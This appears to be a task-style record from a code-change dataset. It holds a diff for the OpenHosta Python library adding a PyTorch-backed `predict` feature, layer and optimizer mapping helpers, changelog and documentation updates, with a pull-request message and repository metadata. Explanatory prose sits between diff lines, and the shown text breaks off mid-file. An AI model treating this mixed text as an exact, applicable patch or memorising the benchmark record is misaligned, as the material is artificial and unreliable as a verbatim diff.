@@ -0,0 +1,272 @@
+from typing import Union
+
+from torch import nn
+from torch import optim
+
+from ..exec.predict.model.neural_network_types import LayerType, LossFunction, OptimizerAlgorithm, Layer
+
+
+def pytorch_layer_to_custom(layer) -> Layer:
+ """
+ Maps a PyTorch layer instance to a custom Layer representation.
+
+ :param layer: PyTorch layer object.
+ :return: A custom Layer object representing the PyTorch layer.
+ """
+ if isinstance(layer, nn.Linear):
+ return Layer(
+ layer_type=LayerType.LINEAR,
+ in_features=layer.in_features,
+ out_features=layer.out_features,
+ )
+
+ elif isinstance(layer, nn.Conv2d):
+ return Layer(
+ layer_type=LayerType.CONV2D,
+ in_features=layer.in_channels,
+ out_features=layer.out_channels,
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding,
+ )
+
+ elif isinstance(layer, nn.Dropout):
+ return Layer(
+ layer_type=LayerType.DROPOUT,
+ dropout=layer.p # Dropout rate
+ )
+
+ elif isinstance(layer, nn.ReLU):
+ return Layer(
+ layer_type=LayerType.RELU
+ )
+
+ elif isinstance(layer, nn.BatchNorm1d):
+ return Layer(
+ layer_type=LayerType.BATCHNORM1D,
+ out_features=layer.num_features
+ )
+
+ elif isinstance(layer, nn.BatchNorm2d):
+ return Layer(
+ layer_type=LayerType.BATCHNORM2D,
+ out_features=layer.num_features
+ )
+
+ elif isinstance(layer, nn.MaxPool2d):
+ return Layer(
+ layer_type=LayerType.MAXPOOL2D,
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding,
+ )
+
+ elif isinstance(layer, nn.AvgPool2d):
+ return Layer(
+ layer_type=LayerType.AVGPOOL2D,
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding,
+ )
+
+ elif isinstance(layer, nn.Sigmoid):
+ return Layer(
+ layer_type=LayerType.SIGMOID
+ )
+
+ elif isinstance(layer, nn.Softmax):
+ return Layer(
+ layer_type=LayerType.SOFTMAX
+ )
+
+ elif isinstance(layer, nn.Tanh):
+ return Layer(
+ layer_type=LayerType.TANH
+ )
+
+ else:
+ raise ValueError(f"Unsupported PyTorch layer type: {layer.__class__.__name__}")
+
+
+def custom_layer_to_pytorch(layer: Layer) -> Union[nn.Module, None]:
+ """
+ Maps a custom Layer instance to a PyTorch layer.
+
+ :param layer: The custom Layer instance.
+ :return: The PyTorch layer instance.
+ """
+ if layer.layer_type == LayerType.LINEAR:
+ return nn.Linear(layer.in_features, layer.out_features)
+
+ elif layer.layer_type == LayerType.CONV2D:
+ return nn.Conv2d(
+ in_channels=layer.in_features,
+ out_channels=layer.out_features,
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding
+ )
+
+ elif layer.layer_type == LayerType.DROPOUT:
+ return nn.Dropout(p=layer.dropout)
+
+ elif layer.layer_type == LayerType.RELU:
+ return nn.ReLU()
+
+ elif layer.layer_type == LayerType.BATCHNORM1D:
+ return nn.BatchNorm1d(num_features=layer.out_features)
+
+ elif layer.layer_type == LayerType.BATCHNORM2D:
+ return nn.BatchNorm2d(num_features=layer.out_features)
+
+ elif layer.layer_type == LayerType.MAXPOOL2D:
+ return nn.MaxPool2d(
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding
+ )
+
+ elif layer.layer_type == LayerType.AVGPOOL2D:
+ return nn.AvgPool2d(
+ kernel_size=layer.kernel_size,
+ stride=layer.stride,
+ padding=layer.padding
+ )
+
+ elif layer.layer_type == LayerType.SIGMOID:
+ return nn.Sigmoid()
+
+ elif layer.layer_type == LayerType.SOFTMAX:
+ return nn.Softmax()
+
+ elif layer.layer_type == LayerType.TANH:
+ return nn.Tanh()
+
+ else:
+ return None
+
+
+_LOSS_FUNC_MAP = {
+ nn.L1Loss: LossFunction.L1_LOSS,
+ nn.MSELoss: LossFunction.MSE_LOSS,
+ nn.CrossEntropyLoss: LossFunction.CROSS_ENTROPY_LOSS,
+ nn.CTCLoss: LossFunction.CTC_LOSS,
+ nn.NLLLoss: LossFunction.NLL_LOSS,
+ nn.PoissonNLLLoss: LossFunction.POISSON_NLL_LOSS,
+ nn.GaussianNLLLoss: LossFunction.GAUSSIAN_NLL_LOSS,
+ nn.KLDivLoss: LossFunction.KL_DIV_LOSS,
+ nn.BCELoss: LossFunction.BCE_LOSS,
+ nn.BCEWithLogitsLoss: LossFunction.BCE_WITH_LOGITS_LOSS,
+ nn.MarginRankingLoss: LossFunction.MARGIN_RANKING_LOSS,
+ nn.HingeEmbeddingLoss: LossFunction.HINGE_EMBEDDING_LOSS,
+ nn.HuberLoss: LossFunction.HUBER_LOSS,
+ nn.SmoothL1Loss: LossFunction.SMOOTH_L1_LOSS,
+ nn.CosineEmbeddingLoss: LossFunction.COSINE_EMBEDDING_LOSS,
+ nn.MultiLabelSoftMarginLoss: LossFunction.MULTI_LABEL_SOFT_MARGIN_LOSS,
+ nn.TripletMarginLoss: LossFunction.TRIPLET_MARGIN_LOSS,
+ nn.MultiMarginLoss: LossFunction.MULTI_MARGIN_LOSS,
+ nn.SoftMarginLoss: LossFunction.SOFT_MARGIN_LOSS,
+ nn.MultiLabelMarginLoss: LossFunction.MULTI_LABEL_MARGIN_LOSS,
+ nn.TripletMarginWithDistanceLoss: LossFunction.TRIPLET_MARGIN_WITH_DISTANCE_LOSS,
+}
+
+
+def pytorch_loss_to_custom(loss_instance) -> LossFunction:
+ """
+ Maps a PyTorch loss function instance to a custom LossFunction enum.
+
+ :param loss_instance: PyTorch loss function object.
+ :return: The custom LossFunction enum.
+ """
+
+ loss_type = type(loss_instance)
+ if loss_type in _LOSS_FUNC_MAP:
+ return _LOSS_FUNC_MAP[loss_type]
+ raise ValueError(f"Unsupported PyTorch loss function: {loss_type.__name__}")
+
+def custom_loss_to_pytorch(loss_function: LossFunction) -> Union[nn.Module, None]:
+ """
+ Maps a custom LossFunction enum to a PyTorch loss function.
+
+ :param loss_function: The custom LossFunction enum.
+ :return: The PyTorch loss function instance.
+ """
+
+    # _LOSS_FUNC_MAP maps PyTorch classes to enum values, so invert it here
+    reverse_map = {v: k for k, v in _LOSS_FUNC_MAP.items()}
+    if loss_function in reverse_map:
+        return reverse_map[loss_function]()
+    return None
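Both directions are dictionary lookups, but `_LOSS_FUNC_MAP` is keyed by the PyTorch class, so the custom-to-PyTorch direction needs the inverted mapping. A torch-free sketch of the pattern with hypothetical stand-in classes:

```python
from enum import Enum


class LossFunction(Enum):
    L1_LOSS = "l1"
    MSE_LOSS = "mse"


# stand-ins for nn.L1Loss / nn.MSELoss, purely for illustration
class FakeL1Loss: pass
class FakeMSELoss: pass


_LOSS_MAP = {FakeL1Loss: LossFunction.L1_LOSS, FakeMSELoss: LossFunction.MSE_LOSS}
_REVERSE_LOSS_MAP = {v: k for k, v in _LOSS_MAP.items()}


def loss_to_custom(loss_instance):
    # forward direction: keyed by the concrete class of the instance
    return _LOSS_MAP[type(loss_instance)]


def custom_to_loss(loss_function):
    # reverse direction: look up the class, then instantiate it
    return _REVERSE_LOSS_MAP[loss_function]()


print(loss_to_custom(FakeMSELoss()))
print(type(custom_to_loss(LossFunction.L1_LOSS)).__name__)
```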
+
+
+_OPTIMIZER_MAP = {
+ optim.Adadelta: OptimizerAlgorithm.ADADELTA,
+ optim.Adagrad: OptimizerAlgorithm.ADAGRAD,
+ optim.Adam: OptimizerAlgorithm.ADAM,
+ optim.AdamW: OptimizerAlgorithm.ADAMW,
+ optim.Adamax: OptimizerAlgorithm.ADAMAX,
+ optim.SparseAdam: OptimizerAlgorithm.SPARSEADAM,
+ optim.ASGD: OptimizerAlgorithm.ASGD,
+ optim.RMSprop: OptimizerAlgorithm.RMSPROP,
+ optim.Rprop: OptimizerAlgorithm.RPROP,
+ optim.SGD: OptimizerAlgorithm.SGD,
+ optim.LBFGS: OptimizerAlgorithm.LBFGS,
+ optim.NAdam: OptimizerAlgorithm.NADAM,
+ optim.RAdam: OptimizerAlgorithm.RADAM,
+}
+
+def pytorch_optimizer_to_custom(optimizer_instance) -> OptimizerAlgorithm:
+ """
+ Maps a PyTorch optimizer instance to a custom OptimizerAlgorithm enum.
+
+ :param optimizer_instance: PyTorch optimizer.
+ :return: The custom OptimizerAlgorithm enum.
+ """
+
+ optimizer_type = type(optimizer_instance)
+ if optimizer_type in _OPTIMIZER_MAP:
+ return _OPTIMIZER_MAP[optimizer_type]
+ raise ValueError(f"Unsupported PyTorch optimizer: {optimizer_type.__name__}")
+
+
+def custom_optimizer_to_pytorch(optimizer_algorithm: OptimizerAlgorithm, model: nn.Module, **kwargs) -> Union[optim.Optimizer, None]:
+ """
+ Maps a custom OptimizerAlgorithm enum to a PyTorch optimizer.
+
+ :param optimizer_algorithm: The custom OptimizerAlgorithm enum.
+ :param model: The PyTorch model.
+ :return: The PyTorch optimizer instance.
+ """
+
+    # _OPTIMIZER_MAP maps PyTorch classes to enum values, so invert it here
+    reverse_map = {v: k for k, v in _OPTIMIZER_MAP.items()}
+    if optimizer_algorithm in reverse_map:
+        return reverse_map[optimizer_algorithm](model.parameters(), **kwargs)
+    return None
+
+def type_size(data, tokens_size=10):
+ """
+ Calculate the _inputs/_outputs size based on the type of the _inputs data.
+
+ Parameters:
+ data: Can be of type int, float, list, tuple, numpy array, PyTorch tensor, set, dict, or string.
+
+ Returns:
+ The size (number of elements) of the given data.
+ """
+    # `data is str` compares a value to the type object and is always False;
+    # isinstance checks are needed (bool first, since bool subclasses int)
+    if isinstance(data, str):
+        return tokens_size
+    elif isinstance(data, bool):
+        return 1
+    elif isinstance(data, (int, float)):
+        return 1
+    elif isinstance(data, list):
+        return len(data) * type_size(data[0]) if data else 0
+    elif isinstance(data, tuple):
+        return sum(type_size(item) for item in data)
+    elif isinstance(data, set):
+        return sum(type_size(item) for item in data)
+    elif isinstance(data, dict):
+        return sum(type_size(k) + type_size(v) for k, v in data.items())
+ # elif isinstance(data, typing._GenericAlias) and get_origin(data) is Literal:
+ # return len(data.__args__)
+ else:
+ raise TypeError(f'Unsupported data type: {type(data)}')
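To see what `type_size` computes, here is a standalone copy (with `isinstance` checks and no torch dependency) applied to a couple of values: a list counts element sizes, a dict counts both keys and values, and a string counts as `tokens_size`:

```python
def type_size(data, tokens_size=10):
    """Standalone copy of the size helper above, for illustration."""
    if isinstance(data, str):
        return tokens_size
    if isinstance(data, bool):
        return 1
    if isinstance(data, (int, float)):
        return 1
    if isinstance(data, list):
        return len(data) * type_size(data[0]) if data else 0
    if isinstance(data, tuple):
        return sum(type_size(item) for item in data)
    if isinstance(data, set):
        return sum(type_size(item) for item in data)
    if isinstance(data, dict):
        return sum(type_size(k) + type_size(v) for k, v in data.items())
    raise TypeError(f"Unsupported data type: {type(data)}")


print(type_size([1.0, 2.0, 3.0]))  # 3 floats, 1 each
print(type_size({"a": 1}))         # key "a" counts as 10 tokens, value as 1
```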
| Refacto ebatt fix
Hello Merlin,
Here are my proposed changes for the beta.
I'll let you decide whether to integrate them as-is into the RC or whether you want to change some details.
Emmanuel
| 2024-11-15T07:52:04 | 0.0 | [] | [] |
|||
hand-e-fr/OpenHosta | hand-e-fr__OpenHosta-136 | 154e2585651ab14822ccde6812248dad256c49f4 | diff --git a/CHAGELOG.md b/CHANGELOG.md
similarity index 81%
rename from CHAGELOG.md
rename to CHANGELOG.md
index e7ff99e..054c21a 100644
--- a/CHAGELOG.md
+++ b/CHANGELOG.md
@@ -2,8 +2,34 @@
All significant changes to this project will be documented in this file.
+## **v1.2rc-1** 10/10/2024
+
+### **New Features**
+
+1. **TrainingSet Management**
+ Manage training datasets effortlessly with new tools:
+ - **`.visualize`**: Inspect current data visually.
+ - **`.add`**: Add new examples.
+
+2. **Enhanced `predict` Attributes**
+ New functionalities for `predict`:
+ - **`.retrain`**: Retrain models with specified parameters.
+ - **`.continue_train`**: Continue training with existing weights.
+ - **`.emulate`**: Run predictions through an LLM.
+
+### **Enhancements**
+
+- **Expanded Dataset Support**: `load_training_example` (*previously `load_examples`*) supports JSON, JSONL, and CSV formats for easier integration.
+
+- **Verbose Mode in `predict`**: Track detailed model training and set target losses with **get_loss**.
+
+### **Fixes**
+
+- **CUDA Compatibility**: `predict` now works with CUDA-enabled GPUs (device ID selection pending).
+
---
+
## **v1.1.1** 10/07/24
- **Features**
@@ -23,7 +49,7 @@ All significant changes to this project will be documented in this file.
- Re-added `diagramm` attributs but decrepated
- Added explicitly a neutral response in the `emulate` prompt (None)
-## **v1.1-rc4** 27/09/24
+## **v1.1-rc4** 09/27/24
- **Feature**
- Added `suggest` function. Works the same as the `__suggest__` attributs but in a function
@@ -37,7 +63,7 @@ All significant changes to this project will be documented in this file.
- **Fixes**
- `suggest` attribute `diagramm` is now `diagram`
-## **v1.1-rc3** 26/09/23
+## **v1.1-rc3** 09/26/23
- **Fixes**
- `emulate` now works when emulated function is called inside another one
@@ -49,7 +75,7 @@ All significant changes to this project will be documented in this file.
- Added a Makefile for cleaning and packaging and tests
---
-## **v1.1** 13/09/2024
+## **v1.1** 09/13/2024
- **Fixes**
- the `emulate` function is now decorator-resistant.
@@ -89,7 +115,7 @@ All significant changes to this project will be documented in this file.
---
-## **v1.0** 29/08/2024:
+## **v1.0** 08/29/2024:
- **Features**
- Function *emulate* to emulate a function by LLM.
diff --git a/README.md b/README.md
index 6a574ac..7ef22dd 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
# OpenHosta
-v1.1.2 - Open-Source Project
+v1.2.0 - Open-Source Project
**- The future of development is human -**
diff --git a/doc/Docs.md b/doc/Docs.md
index f3d45da..d23a425 100644
--- a/doc/Docs.md
+++ b/doc/Docs.md
@@ -1,7 +1,7 @@
# Documentation
___
-Documentation for version: **1.1.2**
+Documentation for version: **1.2.0**
Welcome to **OpenHosta** documentation :). Here you'll find all the **explanations** you need to understand the library, as well as **usage examples** and advanced **configuration** methods for the most complex tasks. You'll also find explanations of the source code for those interested in **contributing** to this project. Check the [Google Colab](https://colab.research.google.com/drive/1XKrPrhLlYJD-ULTA8WHzIMqTXkb3iIpb?usp=sharing) **test files** to help you take your first steps in discovering OpenHosta.
@@ -79,6 +79,10 @@ Let's **get started**! First here's the **table of contents** to help you naviga
- ["suggest" Function](#suggest-function)
- [Usage](#usage)
- [Output Examples](#output-examples)
+ - ["predict" Function](#predict-function)
+ - [Parameters](#predict-function-parameters)
+  - [Additional functionalities](#additional-predict-functionalities)
+ - [Output setting](#training-output)
- ["thought" Function](#thought-function)
- ["example" Function](#example-function)
- [Advanced configuration](#advanced-configuration)
@@ -163,7 +167,7 @@ Note that some features like `thought` or `__suggest__` specifically use the def
config.set_default_model(my_model)
```
-### "emulate" Function
+## `emulate` Function
The *emulate* function is the main feature of OpenHosta. This is the function that allows you to emulate functions with AI, i.e. the instructions will be executed in an LLM and not directly in your computer. Here's how to use it.
@@ -306,6 +310,10 @@ You can also retrieve the entire LLM response by storing the output of the `sugg
Note that this feature uses the default model.
#### Output Examples
- **Enhanced prompt:**
@@ -328,7 +336,163 @@ graph LR
I --> J[End]
```
-### "thought" Function
+
+---
+
+## `predict` Function
+
+The `predict` function is the second major feature of OpenHosta, designed to enable the dynamic creation of models for specific functions. While it shares similarities with the `emulate` function, instead of making API calls to a large language model (LLM), `predict` generates an internal model—currently supporting only linear regression.
+
+### How `predict` Works
+
+The `predict` function allows users to train a model automatically by providing a set of training examples. It simplifies model-building by handling the training process directly within a Python function.
+
+At this time, `predict` has a few **limitations** to be aware of:
+
+- **Supported Input Types**: Only `int` and `float` types are allowed as inputs.
+- **Return Type**: The function returns output as a `float`.
+- **Model Type**: Currently, the function builds a simple linear regression model with a single output.
+- **Training Examples**: You must provide at least one example for the model to be trained correctly.
+
+### Limitations and Known Issues
+
+- Since `predict` is still in its Release Candidate (RC) phase, some instability and bugs might occur.
+- If you encounter any issues, please help improve the functionality by reporting them :)
+
+---
+
+
+*Below is a practical example demonstrating how to use `predict` to build a model that estimates a person's chance of dying based on their age:*
+
+```python
+from OpenHosta import predict, example
+
+def find_chance_of_die(age: float) -> float:
+ """
+    This function predicts the chance of dying as a probability from 0 to 1,
+    based on the age (with the baseline year starting at 1900).
+    """
+    # Hand-crafted interpolated values, not real data
+ example(age=124.0, hosta_out=0.99)
+ example(age=100.5, hosta_out=0.20)
+ example(age=55.0, hosta_out=0.60)
+ example(age=45.0, hosta_out=0.10)
+ example(age=24.8, hosta_out=0.20)
+ example(age=8.0, hosta_out=0.01)
+ return predict()
+
+x = find_chance_of_die(124.0)
+print(x)
+```
+For `example` documentation, please go to this [link](#example-function)
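
Conceptually, `predict` fits a simple linear-style regressor to the `example` pairs. As a rough, framework-free sketch of that idea (plain closed-form least squares on toy data, not OpenHosta's actual training loop):

```python
def fit_line(pairs):
    """Closed-form least squares for y = a * x + b over (x, y) pairs."""
    n = len(pairs)
    sx = sum(x for x, _ in pairs)
    sy = sum(y for _, y in pairs)
    sxx = sum(x * x for x, _ in pairs)
    sxy = sum(x * y for x, y in pairs)
    a = (n * sxy - sx * sy) / (n * sxx - sx * sx)
    b = (sy - a * sx) / n
    return a, b

# Toy data loosely shaped like the age -> risk examples above
pairs = [(8.0, 0.01), (24.8, 0.20), (45.0, 0.10),
         (55.0, 0.60), (100.5, 0.20), (124.0, 0.99)]
a, b = fit_line(pairs)
print(a, b)
```

The fitted slope is positive here, reflecting that risk broadly rises with age in the examples; `predict` itself trains a small network rather than using this closed form.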
+
+### `predict` Function Parameters
+
+The `predict` function includes several parameters that allow you to fine-tune the model's behavior. Below is a list of these parameters:
+
+- **`epochs` (int)**:
+ Defines how many times the model iterates over the training set. Increasing the number of epochs may lead to better model convergence at the cost of longer training times. The default value is 2 times the dataset size, calculated based on the batch size.
+
+- **`complexity` (int)**:
+ Sets the level of complexity for the model, which influences the number of weights based on the length of the input. The default value is `5`.
+
+- **`normalization` (bool)**:
+ Enables or disables data normalization. When set to `True`, the input data will be normalized based on the `norm_min` and `norm_max` values. The default is `False`.
+
+- **`norm_min` (float)**:
+  Defines the minimum value for data normalization. This value helps scale input data to a normalized range. The default is `0.1`, applied to values other than 0.
+
+- **`norm_max` (float)**:
+ Specifies the maximum value for data normalization. This value sets the upper bound for the normalized range. The default is `1.0`.
+
+- **`verbose` (bool)**:
+ Enables or disables verbose output during training. When set to `True`, detailed progress information, including loss values, will be displayed. The default is `False`.
+
+- **`batch_size` (int)**:
+  Defines the number of training examples used in one iteration. By default, it is set to 5% of the dataset size, or to `len(dataset)` when the dataset is too small for a 5% batch.
+
+---
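
To illustrate what the `normalization`, `norm_min` and `norm_max` parameters do, here is a minimal min-max scaling sketch. This is only an illustration of the idea; OpenHosta's internal preparator also handles per-feature ranges and other edge cases:

```python
def min_max_scale(values, norm_min=0.1, norm_max=1.0):
    """Scale positive values into [norm_min, norm_max], keeping exact zeros at 0.0."""
    nonzero = [v for v in values if v > 0]
    lo, hi = min(nonzero), max(nonzero)
    rng = (hi - lo) or 1  # avoid division by zero for constant features
    return [0.0 if v == 0
            else norm_min + ((v - lo) / rng) * (norm_max - norm_min)
            for v in values]

print(min_max_scale([0.0, 8.0, 55.0, 124.0]))
```

The smallest nonzero value maps to `norm_min`, the largest to `norm_max`, and exact zeros are left at 0.0.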
+
+### Additional `predict` Functionalities
+
+The `predict` function also comes with several methods designed to enhance the user experience when building and refining a *Hosta model*. Below are the key methods you can use to interact with and further train your models:
+
+#### 1. `retrain`
+
+The `retrain` method allows you to retrain the model from scratch. It takes several directive parameters:
+
+- **`epochs`**: Specifies the number of training epochs.
+- **`get_loss`**: Defines a target loss for the model to reach during training.
+- **`verbose`**: Displays detailed training information (if set to `True`).
+
+#### Example:
+```python
+find_chance_of_die.retrain(epochs=150, get_loss=0.001, verbose=True)
+```
+
+#### 2. `continue_train`
+
+The `continue_train` method allows you to continue training the model using the current weights, rather than starting from scratch. It also accepts directive parameters:
+
+- **`epochs`**: Specifies how many additional epochs you want to train the model for.
+- **`get_loss`**: Defines a target loss value for the model to reach during continued training.
+- **`verbose`**: Displays training progress information (if set to `True`).
+
+#### Example:
+```python
+find_chance_of_die.continue_train(epochs=150, get_loss=0.001, verbose=True)
+```
+
+#### 3. `emulate`
+
+The `emulate` method makes an API call to a Large Language Model (LLM) to assist in answering predictions made by the `predict` function. For more details, check the documentation of the [`emulate`](#emulate-function) function.
+
+#### Example:
+```python
+find_chance_of_die.emulate(124.0)
+```
+
+---
+
+
+### TrainingSet Management
+
+The `TrainingSet` feature offers easy tools for managing training datasets in `hosta_injected` functions:
+
+- **`.visualize`**: View the current dataset and its examples.
+- **`.add`**: Add new examples to the dataset.
+
+#### Example:
+
+You can generate and add data to your training set like so:
+
+```python
+import math
+
+# `training_maths` is assumed to be a predict-based Hosta function
+# whose training set is being populated here.
+def cos_plus_sin_generator():
+    for i in range(0, 10):
+        for j in range(0, 10):
+            cos_value = math.cos(i) ** i
+            sin_value = math.sin(j) ** j
+            training_maths.add(cos=i, sin=j, hosta_out=cos_value + sin_value)
+            # Add data to the training set
+
+cos_plus_sin_generator()
+training_maths.visualize()  # Visualize the dataset
+```
+
+This allows you to both populate and inspect your training data with ease.
+
+---
+
+### Training Output of predict
+
+When training the model using `predict`, a corresponding folder will be created under `__hostacache__`. This folder will contain:
+- `config.json`: Configuration file describing model parameters like structure, training data, etc.
+- `model.pth`: The serialized weights of the trained model.
+- `normalization.json`: Values for data normalization to ensure consistent input/output scaling.
+
+These files are used to manage the model, its saved state, and how incoming data will be normalized before being processed.
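+
As a sketch of how these files fit together, the snippet below writes and reads back a `config.json` and `normalization.json` with illustrative contents (the key names mirror what the builder and data preparator produce, but the exact schema is OpenHosta's):

```python
import json
import os
import tempfile

# Illustrative contents only; the real files are written by OpenHosta.
config = {
    "architecture": "LinearRegression",
    "input_size": 1,
    "output_size": 1,
    "optimizer": "AdamW",
    "loss": "SmoothL1Loss",
}
norm = {"norm_min": 0.1, "norm_max": 1.0}

model_dir = tempfile.mkdtemp()  # stands in for the __hostacache__ subfolder
with open(os.path.join(model_dir, "config.json"), "w") as f:
    json.dump(config, f)
with open(os.path.join(model_dir, "normalization.json"), "w") as f:
    json.dump(norm, f)

with open(os.path.join(model_dir, "config.json")) as f:
    print(json.load(f)["architecture"])
```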
+
+## `thought` Function
**Lambda** functions in Python provide a way to create small, anonymous functions. These are defined using the lambda keyword and can have any number of input parameters but only a single expression.
@@ -368,7 +532,7 @@ print(x._return_type) # int
**Note** : ***this feature uses the default model.***
-### "example" Function
+## `example` Function
The "example" function is designed to enhance the context of a function for a LLM by adding examples to it. This functionality is encapsulated in the `example` function.
@@ -376,7 +540,9 @@ The "example" function is designed to enhance the context of a function for a LL
- **Versatile**: The "example" function can be used both inside and outside a function to specify examples.
- **Save**: The "example" function provides a tool called `save_examples` that can store all the examples added to a specified function in a ***JSONL*** file.
-- **Load**: The function also offers a tool called `load_examples` to load a ***JSONL*** file into the context of the function.
+- **Load**: The function also offers a tool called `load_training_example` to load a file into the context of the function, especially for the `predict` function.
+
+***Note: `load_training_example` can load `csv`, `json` or `jsonl` files for the moment.***
Here's how it works:
@@ -396,12 +562,12 @@ example(text="Hello World !", language="japanese", hosta_out="こんにちは世
print(translate("Hello World !", "French"))
```
-The "example" function will verify the correlation between the specified input and the parameters of the function. The output should be specified only in the *hosta_out* parameter. If the example are used outside a function, please use the *hosta_func* parameter to specify a function.
+The `example` function will verify the correlation between the specified input and the parameters of the function. The output should be specified only in the *hosta_out* parameter. If the example is used outside a function, please use the *hosta_func* parameter to specify a function.
-Now here's how works `save_examples` and `load_examples`
+Now here's how `save_examples` and `load_training_example` work:
```python
-from OpenHosta import save_examples, load_examples
+from OpenHosta import save_examples, load_training_example
save_examples(hosta_func=translate, hosta_path="translate_func_example")
@@ -413,8 +579,7 @@ def another_translate(text:str, language:str)->str:
"""
return emulate()
-load_examples(hosta_path="translate_func_example.jsonl", hosta_func=another_translate)
-# add the jsonl at the end of the path !
+load_training_example(hosta_path="translate_func_example.jsonl", hosta_func=another_translate)
```
output of the `translate_func_example.jsonl`
diff --git a/pyproject.toml b/pyproject.toml
index 18f4a3b..ca5f911 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
[project]
name = "OpenHosta"
-version = "1.1.2"
+version = "1.2.0"
description = "Open-Source programming project IA integretion in developement environnement"
keywords = ["AI", "GPT", "Natural language", "Autommatic", "Easy"]
authors = [
@@ -30,7 +30,9 @@ dependencies = [
"pydantic>=2.8.2",
"tiktoken>=0.7.0",
"jsonschema>=4.23.0",
- "typing-extensions>=4.12.2"
+ "typing-extensions>=4.12.2",
+ "numpy>=2.1.1",
+ "torch>=2.3.1"
]
[project.urls]
diff --git a/src/OpenHosta/OpenHosta.py b/src/OpenHosta/OpenHosta.py
index 259c989..762efae 100644
--- a/src/OpenHosta/OpenHosta.py
+++ b/src/OpenHosta/OpenHosta.py
@@ -5,23 +5,28 @@
)
from .emulate import _exec_emulate
+from .predict import _exec_predict
+from .trainset import TrainingSet
from . import config
from .thought import thought
from .exec import HostaInjector
-from .example import example, load_examples, save_examples
+from .example import example, save_examples, load_training_example
from .enhancer import suggest
emulate = HostaInjector(_exec_emulate)
+predict = HostaInjector(_exec_predict)
__all__ = (
"emulate",
"thought",
"example",
- "load_examples",
"save_examples",
+ "load_training_example",
+ "TrainingSet",
"config",
"Model",
"DefaultManager",
- "suggest"
+ "suggest",
+ "predict"
)
diff --git a/src/OpenHosta/__init__.py b/src/OpenHosta/__init__.py
index 56ad7c5..44e0ee6 100644
--- a/src/OpenHosta/__init__.py
+++ b/src/OpenHosta/__init__.py
@@ -1,3 +1,3 @@
from .OpenHosta import *
-__version__ = "1.1.2"
\ No newline at end of file
+__version__ = "1.2.0"
diff --git a/src/OpenHosta/build.py b/src/OpenHosta/build.py
new file mode 100644
index 0000000..9b56069
--- /dev/null
+++ b/src/OpenHosta/build.py
@@ -0,0 +1,10 @@
+from .config import Model, DefaultManager
+
+def _exec_build(
+ _function_infos : dict = None,
+ _function_obj: object = None,
+ model: Model = None,
+
+):
+ pass
+
diff --git a/src/OpenHosta/builder.py b/src/OpenHosta/builder.py
new file mode 100644
index 0000000..304e9dd
--- /dev/null
+++ b/src/OpenHosta/builder.py
@@ -0,0 +1,57 @@
+import json
+import os
+import torch
+
+from .model import CustomLinearModel
+
+class Builder():
+ def __init__(self, hidden_dir):
+
+ self.hidden_dir = hidden_dir
+
+
+ def build(self, len_input, len_output, complexity, config, optimizer, loss):
+ assert len_input > 0, "Input size must be greater than 0"
+ assert len_output > 0, "Output size must be greater than 0"
+
+        if complexity is None:
+            complexity = 5
+        if optimizer is not None:
+            print("\033[93mWarning: Changing the optimizer is not supported yet; AdamW is currently used.\033[0m")
+        optimizer = "AdamW"
+        if loss is not None:
+            print("\033[93mWarning: Changing the loss function is not supported yet; SmoothL1Loss is currently used.\033[0m")
+        loss = "SmoothL1Loss"
+
+        if config is None:
+ config = {
+ "architecture": "LinearRegression",
+ "input_size": len_input,
+ "hidden_size_1": len_input * (2 * complexity),
+ "hidden_size_2": len_input * (4 * complexity),
+ "hidden_size_3": len_input * (2 * complexity),
+ "output_size": len_output,
+ "optimizer": optimizer,
+ "loss": loss
+ }
+
+ config_json = json.dumps(config)
+ config_path = os.path.join(self.hidden_dir, "config.json")
+
+ with open(config_path, "w") as f:
+ f.write(config_json)
+ return config["architecture"]
+
+ def load_inference(self, config_path, weight_path, inference):
+ with open(config_path, "r") as file:
+ config = json.load(file)
+
+ model = CustomLinearModel(config, self.hidden_dir)
+ model.load_state_dict(torch.load(weight_path, weights_only=True))
+ output = model.forward(inference)
+ return output
+
+ def trains(self, config, train, val, epochs, verbose, get_loss, continue_training):
+
+ model = CustomLinearModel(config, self.hidden_dir)
+ model.train(train, val, epochs, self.hidden_dir, verbose, get_loss, continue_training)
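
The default `config` built above sizes the hidden layers from the input length and the `complexity` parameter. A standalone sketch of that arithmetic:

```python
def default_hidden_sizes(len_input, complexity=5):
    """Mirror the layer sizing used in Builder.build's default config."""
    return (
        len_input * (2 * complexity),
        len_input * (4 * complexity),
        len_input * (2 * complexity),
    )

print(default_hidden_sizes(1))  # (10, 20, 10)
```

So a single-feature input with the default complexity of 5 yields a 10-20-10 hidden stack; raising `complexity` widens every layer proportionally.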
diff --git a/src/OpenHosta/cache.py b/src/OpenHosta/cache.py
index a0de4a6..23896c5 100644
--- a/src/OpenHosta/cache.py
+++ b/src/OpenHosta/cache.py
@@ -13,7 +13,7 @@
class Hostacache:
- def __init__(self, func, cache_id, value) -> None:
+ def __init__(self, func, cache_id=None, value=None) -> None:
self.func = func
self.cache_id = cache_id
self.value = value
@@ -23,64 +23,74 @@ def __init__(self, func, cache_id, value) -> None:
"return_type": "",
"return_caller": "",
"function_call": "",
+ "function_args": {},
"function_locals": {},
"ho_example": [],
"ho_example_id": 0,
+ "ho_example_links": [],
"ho_cothougt": [],
"ho_cothougt_id": 0,
+ "ho_data": [],
+ "ho_data_id": 0,
}
- def __call__(self):
+ def create_hosta_cache(self):
func_name = self.func.__name__
path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
+ if self.cache_id is None:
+ if os.path.exists(path_name):
+ with open(path_name, "rb") as f:
+ cached_data = pickle.load(f)
+ return cached_data
+ else:
+ return self._parse_and_create_cache_file(path_name)
+
if os.path.exists(path_name):
with open(path_name, "rb") as f:
cached_data = pickle.load(f)
assert self.cache_id in cached_data, "Cache ID not found in cache file"
-
- if self._is_value_already_in_example(self.value, cached_data) == False:
- cached_data[str(self.cache_id)].append(self.value)
- cached_data[f"{str(self.cache_id)}" + "_id"] = self._get_hashFunction(
- str(cached_data[str(self.cache_id)]), 0, 0
- )
- cached_data["hash_function"] = self._get_hashFunction(
- cached_data["function_def"],
- cached_data["ho_example_id"],
